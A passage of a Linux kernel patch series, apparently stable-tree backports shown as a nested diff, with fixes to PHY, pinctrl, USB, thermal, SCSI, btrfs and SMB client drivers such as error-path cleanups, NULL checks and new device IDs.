++			return dev_err_probe(gtr_dev->dev, PTR_ERR(clk),
++					     "Failed to get ref clock %u\n",
++					     refclk);
+ 		}
+ 
+ 		if (!clk)
+ 			continue;
+ 
+-		ret = clk_prepare_enable(clk);
+-		if (ret)
+-			goto err_clk_put;
+-
+ 		gtr_dev->clk[refclk] = clk;
+ 
+ 		/*
+@@ -931,18 +967,11 @@ static int xpsgtr_get_ref_clocks(struct xpsgtr_dev *gtr_dev)
+ 			dev_err(gtr_dev->dev,
+ 				"Invalid rate %lu for reference clock %u\n",
+ 				rate, refclk);
+-			ret = -EINVAL;
+-			goto err_clk_put;
++			return -EINVAL;
+ 		}
+ 	}
+ 
+ 	return 0;
+-
+-err_clk_put:
+-	while (refclk--)
+-		clk_disable_unprepare(gtr_dev->clk[refclk]);
+-
+-	return ret;
+ }
+ 
+ static int xpsgtr_probe(struct platform_device *pdev)
+@@ -951,7 +980,6 @@ static int xpsgtr_probe(struct platform_device *pdev)
+ 	struct xpsgtr_dev *gtr_dev;
+ 	struct phy_provider *provider;
+ 	unsigned int port;
+-	unsigned int i;
+ 	int ret;
+ 
+ 	gtr_dev = devm_kzalloc(&pdev->dev, sizeof(*gtr_dev), GFP_KERNEL);
+@@ -991,8 +1019,7 @@ static int xpsgtr_probe(struct platform_device *pdev)
+ 		phy = devm_phy_create(&pdev->dev, np, &xpsgtr_phyops);
+ 		if (IS_ERR(phy)) {
+ 			dev_err(&pdev->dev, "failed to create PHY\n");
+-			ret = PTR_ERR(phy);
+-			goto err_clk_put;
++			return PTR_ERR(phy);
+ 		}
+ 
+ 		gtr_phy->phy = phy;
+@@ -1003,16 +1030,36 @@ static int xpsgtr_probe(struct platform_device *pdev)
+ 	provider = devm_of_phy_provider_register(&pdev->dev, xpsgtr_xlate);
+ 	if (IS_ERR(provider)) {
+ 		dev_err(&pdev->dev, "registering provider failed\n");
+-		ret = PTR_ERR(provider);
+-		goto err_clk_put;
++		return PTR_ERR(provider);
+ 	}
++
++	pm_runtime_set_active(gtr_dev->dev);
++	pm_runtime_enable(gtr_dev->dev);
++
++	ret = pm_runtime_resume_and_get(gtr_dev->dev);
++	if (ret < 0) {
++		pm_runtime_disable(gtr_dev->dev);
++		return ret;
++	}
++
++	gtr_dev->saved_regs = devm_kmalloc(gtr_dev->dev,
++					   sizeof(save_reg_address),
++					   GFP_KERNEL);
++	if (!gtr_dev->saved_regs)
++		return -ENOMEM;
++
+ 	return 0;
++}
+ 
+-err_clk_put:
+-	for (i = 0; i < ARRAY_SIZE(gtr_dev->clk); i++)
+-		clk_disable_unprepare(gtr_dev->clk[i]);
++static int xpsgtr_remove(struct platform_device *pdev)
++{
++	struct xpsgtr_dev *gtr_dev = platform_get_drvdata(pdev);
+ 
+-	return ret;
++	pm_runtime_disable(gtr_dev->dev);
++	pm_runtime_put_noidle(gtr_dev->dev);
++	pm_runtime_set_suspended(gtr_dev->dev);
++
++	return 0;
+ }
+ 
+ static const struct of_device_id xpsgtr_of_match[] = {
+@@ -1024,10 +1071,11 @@ MODULE_DEVICE_TABLE(of, xpsgtr_of_match);
+ 
+ static struct platform_driver xpsgtr_driver = {
+ 	.probe = xpsgtr_probe,
++	.remove	= xpsgtr_remove,
+ 	.driver = {
+ 		.name = "xilinx-psgtr",
+ 		.of_match_table	= xpsgtr_of_match,
+-		.pm =  &xpsgtr_pm_ops,
++		.pm =  pm_ptr(&xpsgtr_pm_ops),
+ 	},
+ };
+ 
+diff --git a/drivers/pinctrl/mediatek/pinctrl-mtk-common-v2.c b/drivers/pinctrl/mediatek/pinctrl-mtk-common-v2.c
+index b7921b59eb7b1..54301fbba524a 100644
+--- a/drivers/pinctrl/mediatek/pinctrl-mtk-common-v2.c
++++ b/drivers/pinctrl/mediatek/pinctrl-mtk-common-v2.c
+@@ -709,32 +709,35 @@ static int mtk_pinconf_bias_set_rsel(struct mtk_pinctrl *hw,
+ {
+ 	int err, rsel_val;
+ 
+-	if (!pullup && arg == MTK_DISABLE)
+-		return 0;
+-
+ 	if (hw->rsel_si_unit) {
+ 		/* find pin rsel_index from pin_rsel array*/
+ 		err = mtk_hw_pin_rsel_lookup(hw, desc, pullup, arg, &rsel_val);
+ 		if (err)
+-			goto out;
++			return err;
+ 	} else {
+-		if (arg < MTK_PULL_SET_RSEL_000 ||
+-		    arg > MTK_PULL_SET_RSEL_111) {
+-			err = -EINVAL;
+-			goto out;
+-		}
++		if (arg < MTK_PULL_SET_RSEL_000 || arg > MTK_PULL_SET_RSEL_111)
++			return -EINVAL;
+ 
+ 		rsel_val = arg - MTK_PULL_SET_RSEL_000;
+ 	}
+ 
+-	err = mtk_hw_set_value(hw, desc, PINCTRL_PIN_REG_RSEL, rsel_val);
+-	if (err)
+-		goto out;
++	return mtk_hw_set_value(hw, desc, PINCTRL_PIN_REG_RSEL, rsel_val);
++}
+ 
+-	err = mtk_pinconf_bias_set_pu_pd(hw, desc, pullup, MTK_ENABLE);
++static int mtk_pinconf_bias_set_pu_pd_rsel(struct mtk_pinctrl *hw,
++					   const struct mtk_pin_desc *desc,
++					   u32 pullup, u32 arg)
++{
++	u32 enable = arg == MTK_DISABLE ? MTK_DISABLE : MTK_ENABLE;
++	int err;
+ 
+-out:
+-	return err;
++	if (arg != MTK_DISABLE) {
++		err = mtk_pinconf_bias_set_rsel(hw, desc, pullup, arg);
++		if (err)
++			return err;
++	}
++
++	return mtk_pinconf_bias_set_pu_pd(hw, desc, pullup, enable);
+ }
+ 
+ int mtk_pinconf_bias_set_combo(struct mtk_pinctrl *hw,
+@@ -750,22 +753,22 @@ int mtk_pinconf_bias_set_combo(struct mtk_pinctrl *hw,
+ 		try_all_type = MTK_PULL_TYPE_MASK;
+ 
+ 	if (try_all_type & MTK_PULL_RSEL_TYPE) {
+-		err = mtk_pinconf_bias_set_rsel(hw, desc, pullup, arg);
++		err = mtk_pinconf_bias_set_pu_pd_rsel(hw, desc, pullup, arg);
+ 		if (!err)
+-			return err;
++			return 0;
+ 	}
+ 
+ 	if (try_all_type & MTK_PULL_PU_PD_TYPE) {
+ 		err = mtk_pinconf_bias_set_pu_pd(hw, desc, pullup, arg);
+ 		if (!err)
+-			return err;
++			return 0;
+ 	}
+ 
+ 	if (try_all_type & MTK_PULL_PULLSEL_TYPE) {
+ 		err = mtk_pinconf_bias_set_pullsel_pullen(hw, desc,
+ 							  pullup, arg);
+ 		if (!err)
+-			return err;
++			return 0;
+ 	}
+ 
+ 	if (try_all_type & MTK_PULL_PUPD_R1R0_TYPE)
+@@ -803,9 +806,9 @@ static int mtk_rsel_get_si_unit(struct mtk_pinctrl *hw,
+ 	return 0;
+ }
+ 
+-static int mtk_pinconf_bias_get_rsel(struct mtk_pinctrl *hw,
+-				     const struct mtk_pin_desc *desc,
+-				     u32 *pullup, u32 *enable)
++static int mtk_pinconf_bias_get_pu_pd_rsel(struct mtk_pinctrl *hw,
++					   const struct mtk_pin_desc *desc,
++					   u32 *pullup, u32 *enable)
+ {
+ 	int pu, pd, rsel, err;
+ 
+@@ -939,22 +942,22 @@ int mtk_pinconf_bias_get_combo(struct mtk_pinctrl *hw,
+ 		try_all_type = MTK_PULL_TYPE_MASK;
+ 
+ 	if (try_all_type & MTK_PULL_RSEL_TYPE) {
+-		err = mtk_pinconf_bias_get_rsel(hw, desc, pullup, enable);
++		err = mtk_pinconf_bias_get_pu_pd_rsel(hw, desc, pullup, enable);
+ 		if (!err)
+-			return err;
++			return 0;
+ 	}
+ 
+ 	if (try_all_type & MTK_PULL_PU_PD_TYPE) {
+ 		err = mtk_pinconf_bias_get_pu_pd(hw, desc, pullup, enable);
+ 		if (!err)
+-			return err;
++			return 0;
+ 	}
+ 
+ 	if (try_all_type & MTK_PULL_PULLSEL_TYPE) {
+ 		err = mtk_pinconf_bias_get_pullsel_pullen(hw, desc,
+ 							  pullup, enable);
+ 		if (!err)
+-			return err;
++			return 0;
+ 	}
+ 
+ 	if (try_all_type & MTK_PULL_PUPD_R1R0_TYPE)
+diff --git a/drivers/pinctrl/pinctrl-rockchip.c b/drivers/pinctrl/pinctrl-rockchip.c
+index 6d140a60888c2..ca5a01c11ce60 100644
+--- a/drivers/pinctrl/pinctrl-rockchip.c
++++ b/drivers/pinctrl/pinctrl-rockchip.c
+@@ -3803,7 +3803,7 @@ static struct rockchip_pin_bank rk3328_pin_banks[] = {
+ 	PIN_BANK_IOMUX_FLAGS(0, 32, "gpio0", 0, 0, 0, 0),
+ 	PIN_BANK_IOMUX_FLAGS(1, 32, "gpio1", 0, 0, 0, 0),
+ 	PIN_BANK_IOMUX_FLAGS(2, 32, "gpio2", 0,
+-			     0,
++			     IOMUX_WIDTH_2BIT,
+ 			     IOMUX_WIDTH_3BIT,
+ 			     0),
+ 	PIN_BANK_IOMUX_FLAGS(3, 32, "gpio3",
+diff --git a/drivers/pinctrl/pinctrl-single.c b/drivers/pinctrl/pinctrl-single.c
+index cd23479f352a2..d32d5c5e99bcd 100644
+--- a/drivers/pinctrl/pinctrl-single.c
++++ b/drivers/pinctrl/pinctrl-single.c
+@@ -350,6 +350,8 @@ static int pcs_get_function(struct pinctrl_dev *pctldev, unsigned pin,
+ 		return -ENOTSUPP;
+ 	fselector = setting->func;
+ 	function = pinmux_generic_get_function(pctldev, fselector);
++	if (!function)
++		return -EINVAL;
+ 	*func = function->data;
+ 	if (!(*func)) {
+ 		dev_err(pcs->dev, "%s could not find function%i\n",
+diff --git a/drivers/scsi/aacraid/comminit.c b/drivers/scsi/aacraid/comminit.c
+index bd99c5492b7d4..0f64b02443037 100644
+--- a/drivers/scsi/aacraid/comminit.c
++++ b/drivers/scsi/aacraid/comminit.c
+@@ -642,6 +642,7 @@ struct aac_dev *aac_init_adapter(struct aac_dev *dev)
+ 
+ 	if (aac_comm_init(dev)<0){
+ 		kfree(dev->queues);
++		dev->queues = NULL;
+ 		return NULL;
+ 	}
+ 	/*
+@@ -649,6 +650,7 @@ struct aac_dev *aac_init_adapter(struct aac_dev *dev)
+ 	 */
+ 	if (aac_fib_setup(dev) < 0) {
+ 		kfree(dev->queues);
++		dev->queues = NULL;
+ 		return NULL;
+ 	}
+ 		
+diff --git a/drivers/soc/qcom/cmd-db.c b/drivers/soc/qcom/cmd-db.c
+index 2a7d089ec7270..81ddbcd253d92 100644
+--- a/drivers/soc/qcom/cmd-db.c
++++ b/drivers/soc/qcom/cmd-db.c
+@@ -354,7 +354,7 @@ static int cmd_db_dev_probe(struct platform_device *pdev)
+ 		return -EINVAL;
+ 	}
+ 
+-	cmd_db_header = memremap(rmem->base, rmem->size, MEMREMAP_WB);
++	cmd_db_header = memremap(rmem->base, rmem->size, MEMREMAP_WC);
+ 	if (!cmd_db_header) {
+ 		ret = -ENOMEM;
+ 		cmd_db_header = NULL;
+diff --git a/drivers/soundwire/stream.c b/drivers/soundwire/stream.c
+index 2624441d2fa92..2a245f3b7738f 100644
+--- a/drivers/soundwire/stream.c
++++ b/drivers/soundwire/stream.c
+@@ -1272,18 +1272,18 @@ struct sdw_dpn_prop *sdw_get_slave_dpn_prop(struct sdw_slave *slave,
+ 					    unsigned int port_num)
+ {
+ 	struct sdw_dpn_prop *dpn_prop;
+-	u8 num_ports;
++	unsigned long mask;
+ 	int i;
+ 
+ 	if (direction == SDW_DATA_DIR_TX) {
+-		num_ports = hweight32(slave->prop.source_ports);
++		mask = slave->prop.source_ports;
+ 		dpn_prop = slave->prop.src_dpn_prop;
+ 	} else {
+-		num_ports = hweight32(slave->prop.sink_ports);
++		mask = slave->prop.sink_ports;
+ 		dpn_prop = slave->prop.sink_dpn_prop;
+ 	}
+ 
+-	for (i = 0; i < num_ports; i++) {
++	for_each_set_bit(i, &mask, 32) {
+ 		if (dpn_prop[i].num == port_num)
+ 			return &dpn_prop[i];
+ 	}
+diff --git a/drivers/thermal/thermal_of.c b/drivers/thermal/thermal_of.c
+index 202dce0d2e309..323c8cd171485 100644
+--- a/drivers/thermal/thermal_of.c
++++ b/drivers/thermal/thermal_of.c
+@@ -235,7 +235,7 @@ static int thermal_of_populate_trip(struct device_node *np,
+ static struct thermal_trip *thermal_of_trips_init(struct device_node *np, int *ntrips)
+ {
+ 	struct thermal_trip *tt;
+-	struct device_node *trips, *trip;
++	struct device_node *trips;
+ 	int ret, count;
+ 
+ 	trips = of_get_child_by_name(np, "trips");
+@@ -260,7 +260,7 @@ static struct thermal_trip *thermal_of_trips_init(struct device_node *np, int *n
+ 	*ntrips = count;
+ 
+ 	count = 0;
+-	for_each_child_of_node(trips, trip) {
++	for_each_child_of_node_scoped(trips, trip) {
+ 		ret = thermal_of_populate_trip(trip, &tt[count++]);
+ 		if (ret)
+ 			goto out_kfree;
+@@ -294,14 +294,14 @@ static struct device_node *of_thermal_zone_find(struct device_node *sensor, int
+ 	 * Search for each thermal zone, a defined sensor
+ 	 * corresponding to the one passed as parameter
+ 	 */
+-	for_each_available_child_of_node(np, tz) {
++	for_each_available_child_of_node_scoped(np, child) {
+ 
+ 		int count, i;
+ 
+-		count = of_count_phandle_with_args(tz, "thermal-sensors",
++		count = of_count_phandle_with_args(child, "thermal-sensors",
+ 						   "#thermal-sensor-cells");
+ 		if (count <= 0) {
+-			pr_err("%pOFn: missing thermal sensor\n", tz);
++			pr_err("%pOFn: missing thermal sensor\n", child);
+ 			tz = ERR_PTR(-EINVAL);
+ 			goto out;
+ 		}
+@@ -310,18 +310,19 @@ static struct device_node *of_thermal_zone_find(struct device_node *sensor, int
+ 
+ 			int ret;
+ 
+-			ret = of_parse_phandle_with_args(tz, "thermal-sensors",
++			ret = of_parse_phandle_with_args(child, "thermal-sensors",
+ 							 "#thermal-sensor-cells",
+ 							 i, &sensor_specs);
+ 			if (ret < 0) {
+-				pr_err("%pOFn: Failed to read thermal-sensors cells: %d\n", tz, ret);
++				pr_err("%pOFn: Failed to read thermal-sensors cells: %d\n", child, ret);
+ 				tz = ERR_PTR(ret);
+ 				goto out;
+ 			}
+ 
+ 			if ((sensor == sensor_specs.np) && id == (sensor_specs.args_count ?
+ 								  sensor_specs.args[0] : 0)) {
+-				pr_debug("sensor %pOFn id=%d belongs to %pOFn\n", sensor, id, tz);
++				pr_debug("sensor %pOFn id=%d belongs to %pOFn\n", sensor, id, child);
++				tz = no_free_ptr(child);
+ 				goto out;
+ 			}
+ 		}
+diff --git a/drivers/usb/cdns3/cdnsp-gadget.h b/drivers/usb/cdns3/cdnsp-gadget.h
+index f740fa6089d85..a61aef0dc273c 100644
+--- a/drivers/usb/cdns3/cdnsp-gadget.h
++++ b/drivers/usb/cdns3/cdnsp-gadget.h
+@@ -811,6 +811,7 @@ struct cdnsp_stream_info {
+  *        generate Missed Service Error Event.
+  *        Set skip flag when receive a Missed Service Error Event and
+  *        process the missed tds on the endpoint ring.
++ * @wa1_nop_trb: hold pointer to NOP trb.
+  */
+ struct cdnsp_ep {
+ 	struct usb_ep endpoint;
+@@ -838,6 +839,8 @@ struct cdnsp_ep {
+ #define EP_UNCONFIGURED		BIT(7)
+ 
+ 	bool skip;
++	union cdnsp_trb	 *wa1_nop_trb;
++
+ };
+ 
+ /**
+diff --git a/drivers/usb/cdns3/cdnsp-ring.c b/drivers/usb/cdns3/cdnsp-ring.c
+index 8a2cc0405a4ad..04e8db773a825 100644
+--- a/drivers/usb/cdns3/cdnsp-ring.c
++++ b/drivers/usb/cdns3/cdnsp-ring.c
+@@ -402,7 +402,7 @@ static u64 cdnsp_get_hw_deq(struct cdnsp_device *pdev,
+ 	struct cdnsp_stream_ctx *st_ctx;
+ 	struct cdnsp_ep *pep;
+ 
+-	pep = &pdev->eps[stream_id];
++	pep = &pdev->eps[ep_index];
+ 
+ 	if (pep->ep_state & EP_HAS_STREAMS) {
+ 		st_ctx = &pep->stream_info.stream_ctx_array[stream_id];
+@@ -1902,6 +1902,23 @@ int cdnsp_queue_bulk_tx(struct cdnsp_device *pdev, struct cdnsp_request *preq)
+ 	if (ret)
+ 		return ret;
+ 
++	/*
++	 * workaround 1: STOP EP command on LINK TRB with TC bit set to 1
++	 * causes that internal cycle bit can have incorrect state after
++	 * command complete. In consequence empty transfer ring can be
++	 * incorrectly detected when EP is resumed.
++	 * NOP TRB before LINK TRB avoid such scenario. STOP EP command is
++	 * then on NOP TRB and internal cycle bit is not changed and have
++	 * correct value.
++	 */
++	if (pep->wa1_nop_trb) {
++		field = le32_to_cpu(pep->wa1_nop_trb->trans_event.flags);
++		field ^= TRB_CYCLE;
++
++		pep->wa1_nop_trb->trans_event.flags = cpu_to_le32(field);
++		pep->wa1_nop_trb = NULL;
++	}
++
+ 	/*
+ 	 * Don't give the first TRB to the hardware (by toggling the cycle bit)
+ 	 * until we've finished creating all the other TRBs. The ring's cycle
+@@ -1997,6 +2014,17 @@ int cdnsp_queue_bulk_tx(struct cdnsp_device *pdev, struct cdnsp_request *preq)
+ 		send_addr = addr;
+ 	}
+ 
++	if (cdnsp_trb_is_link(ring->enqueue + 1)) {
++		field = TRB_TYPE(TRB_TR_NOOP) | TRB_IOC;
++		if (!ring->cycle_state)
++			field |= TRB_CYCLE;
++
++		pep->wa1_nop_trb = ring->enqueue;
++
++		cdnsp_queue_trb(pdev, ring, 0, 0x0, 0x0,
++				TRB_INTR_TARGET(0), field);
++	}
++
+ 	cdnsp_check_trb_math(preq, enqd_len);
+ 	ret = cdnsp_giveback_first_trb(pdev, pep, preq->request.stream_id,
+ 				       start_cycle, start_trb);
+diff --git a/drivers/usb/class/cdc-acm.c b/drivers/usb/class/cdc-acm.c
+index 2a7eea4e251a1..98511acfffe4e 100644
+--- a/drivers/usb/class/cdc-acm.c
++++ b/drivers/usb/class/cdc-acm.c
+@@ -1737,6 +1737,9 @@ static const struct usb_device_id acm_ids[] = {
+ 	{ USB_DEVICE(0x11ca, 0x0201), /* VeriFone Mx870 Gadget Serial */
+ 	.driver_info = SINGLE_RX_URB,
+ 	},
++	{ USB_DEVICE(0x1901, 0x0006), /* GE Healthcare Patient Monitor UI Controller */
++	.driver_info = DISABLE_ECHO, /* DISABLE ECHO in termios flag */
++	},
+ 	{ USB_DEVICE(0x1965, 0x0018), /* Uniden UBC125XLT */
+ 	.driver_info = NO_UNION_NORMAL, /* has no union descriptor */
+ 	},
+diff --git a/drivers/usb/core/sysfs.c b/drivers/usb/core/sysfs.c
+index 5f1e07341f363..4fd1bfd524490 100644
+--- a/drivers/usb/core/sysfs.c
++++ b/drivers/usb/core/sysfs.c
+@@ -670,6 +670,7 @@ static int add_power_attributes(struct device *dev)
+ 
+ static void remove_power_attributes(struct device *dev)
+ {
++	sysfs_unmerge_group(&dev->kobj, &usb3_hardware_lpm_attr_group);
+ 	sysfs_unmerge_group(&dev->kobj, &usb2_hardware_lpm_attr_group);
+ 	sysfs_unmerge_group(&dev->kobj, &power_attr_group);
+ }
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 4964fa7419efa..5b761a2a87a7f 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -553,9 +553,17 @@ int dwc3_event_buffers_setup(struct dwc3 *dwc)
+ void dwc3_event_buffers_cleanup(struct dwc3 *dwc)
+ {
+ 	struct dwc3_event_buffer	*evt;
++	u32				reg;
+ 
+ 	if (!dwc->ev_buf)
+ 		return;
++	/*
++	 * Exynos platforms may not be able to access event buffer if the
++	 * controller failed to halt on dwc3_core_exit().
++	 */
++	reg = dwc3_readl(dwc->regs, DWC3_DSTS);
++	if (!(reg & DWC3_DSTS_DEVCTRLHLT))
++		return;
+ 
+ 	evt = dwc->ev_buf;
+ 
+diff --git a/drivers/usb/dwc3/dwc3-omap.c b/drivers/usb/dwc3/dwc3-omap.c
+index efaf0db595f46..6b59bbb22da49 100644
+--- a/drivers/usb/dwc3/dwc3-omap.c
++++ b/drivers/usb/dwc3/dwc3-omap.c
+@@ -522,11 +522,13 @@ static int dwc3_omap_probe(struct platform_device *pdev)
+ 	if (ret) {
+ 		dev_err(dev, "failed to request IRQ #%d --> %d\n",
+ 			omap->irq, ret);
+-		goto err1;
++		goto err2;
+ 	}
+ 	dwc3_omap_enable_irqs(omap);
+ 	return 0;
+ 
++err2:
++	of_platform_depopulate(dev);
+ err1:
+ 	pm_runtime_put_sync(dev);
+ 	pm_runtime_disable(dev);
+diff --git a/drivers/usb/dwc3/dwc3-st.c b/drivers/usb/dwc3/dwc3-st.c
+index fea5290de83fb..20133fbb91473 100644
+--- a/drivers/usb/dwc3/dwc3-st.c
++++ b/drivers/usb/dwc3/dwc3-st.c
+@@ -219,10 +219,8 @@ static int st_dwc3_probe(struct platform_device *pdev)
+ 	dwc3_data->regmap = regmap;
+ 
+ 	res = platform_get_resource_byname(pdev, IORESOURCE_MEM, "syscfg-reg");
+-	if (!res) {
+-		ret = -ENXIO;
+-		goto undo_platform_dev_alloc;
+-	}
++	if (!res)
++		return -ENXIO;
+ 
+ 	dwc3_data->syscfg_reg_off = res->start;
+ 
+@@ -233,8 +231,7 @@ static int st_dwc3_probe(struct platform_device *pdev)
+ 		devm_reset_control_get_exclusive(dev, "powerdown");
+ 	if (IS_ERR(dwc3_data->rstc_pwrdn)) {
+ 		dev_err(&pdev->dev, "could not get power controller\n");
+-		ret = PTR_ERR(dwc3_data->rstc_pwrdn);
+-		goto undo_platform_dev_alloc;
++		return PTR_ERR(dwc3_data->rstc_pwrdn);
+ 	}
+ 
+ 	/* Manage PowerDown */
+@@ -269,7 +266,7 @@ static int st_dwc3_probe(struct platform_device *pdev)
+ 	if (!child_pdev) {
+ 		dev_err(dev, "failed to find dwc3 core device\n");
+ 		ret = -ENODEV;
+-		goto err_node_put;
++		goto depopulate;
+ 	}
+ 
+ 	dwc3_data->dr_mode = usb_get_dr_mode(&child_pdev->dev);
+@@ -285,6 +282,7 @@ static int st_dwc3_probe(struct platform_device *pdev)
+ 	ret = st_dwc3_drd_init(dwc3_data);
+ 	if (ret) {
+ 		dev_err(dev, "drd initialisation failed\n");
++		of_platform_depopulate(dev);
+ 		goto undo_softreset;
+ 	}
+ 
+@@ -294,14 +292,14 @@ static int st_dwc3_probe(struct platform_device *pdev)
+ 	platform_set_drvdata(pdev, dwc3_data);
+ 	return 0;
+ 
++depopulate:
++	of_platform_depopulate(dev);
+ err_node_put:
+ 	of_node_put(child);
+ undo_softreset:
+ 	reset_control_assert(dwc3_data->rstc_rst);
+ undo_powerdown:
+ 	reset_control_assert(dwc3_data->rstc_pwrdn);
+-undo_platform_dev_alloc:
+-	platform_device_put(pdev);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index cb0eb7fd25426..d34458f11d825 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -619,6 +619,8 @@ static void option_instat_callback(struct urb *urb);
+ 
+ /* MeiG Smart Technology products */
+ #define MEIGSMART_VENDOR_ID			0x2dee
++/* MeiG Smart SRM825L based on Qualcomm 315 */
++#define MEIGSMART_PRODUCT_SRM825L		0x4d22
+ /* MeiG Smart SLM320 based on UNISOC UIS8910 */
+ #define MEIGSMART_PRODUCT_SLM320		0x4d41
+ 
+@@ -2366,6 +2368,9 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(UNISOC_VENDOR_ID, TOZED_PRODUCT_LT70C, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(UNISOC_VENDOR_ID, LUAT_PRODUCT_AIR720U, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(MEIGSMART_VENDOR_ID, MEIGSMART_PRODUCT_SLM320, 0xff, 0, 0) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(MEIGSMART_VENDOR_ID, MEIGSMART_PRODUCT_SRM825L, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(MEIGSMART_VENDOR_ID, MEIGSMART_PRODUCT_SRM825L, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(MEIGSMART_VENDOR_ID, MEIGSMART_PRODUCT_SRM825L, 0xff, 0xff, 0x60) },
+ 	{ } /* Terminating entry */
+ };
+ MODULE_DEVICE_TABLE(usb, option_ids);
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index bb77f646366a5..013f61bbf28f8 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -2397,7 +2397,7 @@ static int tcpm_register_source_caps(struct tcpm_port *port)
+ {
+ 	struct usb_power_delivery_desc desc = { port->negotiated_rev };
+ 	struct usb_power_delivery_capabilities_desc caps = { };
+-	struct usb_power_delivery_capabilities *cap;
++	struct usb_power_delivery_capabilities *cap = port->partner_source_caps;
+ 
+ 	if (!port->partner_pd)
+ 		port->partner_pd = usb_power_delivery_register(NULL, &desc);
+@@ -2407,6 +2407,11 @@ static int tcpm_register_source_caps(struct tcpm_port *port)
+ 	memcpy(caps.pdo, port->source_caps, sizeof(u32) * port->nr_source_caps);
+ 	caps.role = TYPEC_SOURCE;
+ 
++	if (cap) {
++		usb_power_delivery_unregister_capabilities(cap);
++		port->partner_source_caps = NULL;
++	}
++
+ 	cap = usb_power_delivery_register_capabilities(port->partner_pd, &caps);
+ 	if (IS_ERR(cap))
+ 		return PTR_ERR(cap);
+@@ -2420,7 +2425,7 @@ static int tcpm_register_sink_caps(struct tcpm_port *port)
+ {
+ 	struct usb_power_delivery_desc desc = { port->negotiated_rev };
+ 	struct usb_power_delivery_capabilities_desc caps = { };
+-	struct usb_power_delivery_capabilities *cap = port->partner_source_caps;
++	struct usb_power_delivery_capabilities *cap;
+ 
+ 	if (!port->partner_pd)
+ 		port->partner_pd = usb_power_delivery_register(NULL, &desc);
+@@ -2430,11 +2435,6 @@ static int tcpm_register_sink_caps(struct tcpm_port *port)
+ 	memcpy(caps.pdo, port->sink_caps, sizeof(u32) * port->nr_sink_caps);
+ 	caps.role = TYPEC_SINK;
+ 
+-	if (cap) {
+-		usb_power_delivery_unregister_capabilities(cap);
+-		port->partner_source_caps = NULL;
+-	}
+-
+ 	cap = usb_power_delivery_register_capabilities(port->partner_pd, &caps);
+ 	if (IS_ERR(cap))
+ 		return PTR_ERR(cap);
+diff --git a/drivers/video/fbdev/offb.c b/drivers/video/fbdev/offb.c
+index 6f0a9851b0924..ea232395e226f 100644
+--- a/drivers/video/fbdev/offb.c
++++ b/drivers/video/fbdev/offb.c
+@@ -27,6 +27,7 @@
+ #include <linux/ioport.h>
+ #include <linux/pci.h>
+ #include <linux/platform_device.h>
++#include <linux/cleanup.h>
+ #include <asm/io.h>
+ 
+ #ifdef CONFIG_PPC32
+diff --git a/fs/btrfs/compression.c b/fs/btrfs/compression.c
+index e6635fe700678..cb56ac8b925e6 100644
+--- a/fs/btrfs/compression.c
++++ b/fs/btrfs/compression.c
+@@ -613,6 +613,7 @@ static noinline int add_ra_bio_pages(struct inode *inode,
+ 			put_page(page);
+ 			break;
+ 		}
++		add_size = min(em->start + em->len, page_end + 1) - cur;
+ 		free_extent_map(em);
+ 
+ 		if (page->index == end_index) {
+@@ -625,7 +626,6 @@ static noinline int add_ra_bio_pages(struct inode *inode,
+ 			}
+ 		}
+ 
+-		add_size = min(em->start + em->len, page_end + 1) - cur;
+ 		ret = bio_add_page(cb->orig_bio, page, add_size, offset_in_page(cur));
+ 		if (ret != add_size) {
+ 			unlock_extent(tree, cur, page_end, NULL);
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index f3b066b442807..59bb9653615e8 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -3745,6 +3745,8 @@ static int try_flush_qgroup(struct btrfs_root *root)
+ 		return 0;
+ 	}
+ 
++	btrfs_run_delayed_iputs(root->fs_info);
++	btrfs_wait_on_delayed_iputs(root->fs_info);
+ 	ret = btrfs_start_delalloc_snapshot(root, true);
+ 	if (ret < 0)
+ 		goto out;
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index fad4b5dcfbd5a..992ac7d20e5eb 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -4184,7 +4184,7 @@ smb2_new_read_req(void **buf, unsigned int *total_len,
+ 	 * If we want to do a RDMA write, fill in and append
+ 	 * smbd_buffer_descriptor_v1 to the end of read request
+ 	 */
+-	if (smb3_use_rdma_offload(io_parms)) {
++	if (rdata && smb3_use_rdma_offload(io_parms)) {
+ 		struct smbd_buffer_descriptor_v1 *v1;
+ 		bool need_invalidate = server->dialect == SMB30_PROT_ID;
+ 
+diff --git a/include/linux/of.h b/include/linux/of.h
+index 1c5301e10442f..2960e609ca05e 100644
+--- a/include/linux/of.h
++++ b/include/linux/of.h
+@@ -13,6 +13,7 @@
+  */
+ #include <linux/types.h>
+ #include <linux/bitops.h>
++#include <linux/cleanup.h>
+ #include <linux/errno.h>
+ #include <linux/kobject.h>
+ #include <linux/mod_devicetable.h>
+@@ -128,6 +129,7 @@ static inline struct device_node *of_node_get(struct device_node *node)
+ }
+ static inline void of_node_put(struct device_node *node) { }
+ #endif /* !CONFIG_OF_DYNAMIC */
++DEFINE_FREE(device_node, struct device_node *, if (_T) of_node_put(_T))
+ 
+ /* Pointer for first entry in chain of all nodes. */
+ extern struct device_node *of_root;
+@@ -1371,10 +1373,23 @@ static inline int of_property_read_s32(const struct device_node *np,
+ #define for_each_child_of_node(parent, child) \
+ 	for (child = of_get_next_child(parent, NULL); child != NULL; \
+ 	     child = of_get_next_child(parent, child))
++
++#define for_each_child_of_node_scoped(parent, child) \
